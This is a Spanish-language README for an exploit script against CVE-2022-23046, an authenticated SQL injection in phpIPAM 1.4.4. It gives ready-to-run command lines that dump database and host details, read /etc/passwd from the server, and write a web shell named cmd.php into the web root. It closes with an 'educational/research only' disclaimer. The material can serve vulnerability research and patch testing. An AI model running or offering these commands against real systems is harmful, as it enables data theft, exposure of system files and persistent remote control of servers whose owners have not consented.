
CVE-2022-23046 phpIPAM 1.4.4
phpIPAM v1.4.4 permite a un usuario administrador autenticado inyectar sentencias SQL en el parámetro subnet mientras busca una subred a través de app/admin/routing/edit-bgp-mapping-search.php. Este proyecto actualmente imprime información de la base de datos y la versión del host. También puede intentar leer archivos y escribir en el servidor.
python3 phpipam_1.4.4.py -t http://phpipam.com/ -u username -p password
python3 phpipam_1.4.4.py -t http://phpipam.com/ -u username -p password -f /etc/passwd
python3 phpipam_1.4.4.py -t http://phpipam.com/ -u username -p password -w /var/www/html/cmd.php
Para el menú de ayuda
python3 phpipam_1.4.4.py -h
Todo el código proporcionado en este repositorio es solo para fines educativos/de investigación. Cualquier acción y/o actividad relacionada con el material contenido en este repositorio es de su exclusiva responsabilidad. El uso indebido del código en este repositorio puede resultar en cargos penales contra las personas en cuestión. El autor no será considerado responsable en el caso de que se presenten cargos penales contra cualquier persona que haga un uso indebido del código en este repositorio para violar la ley.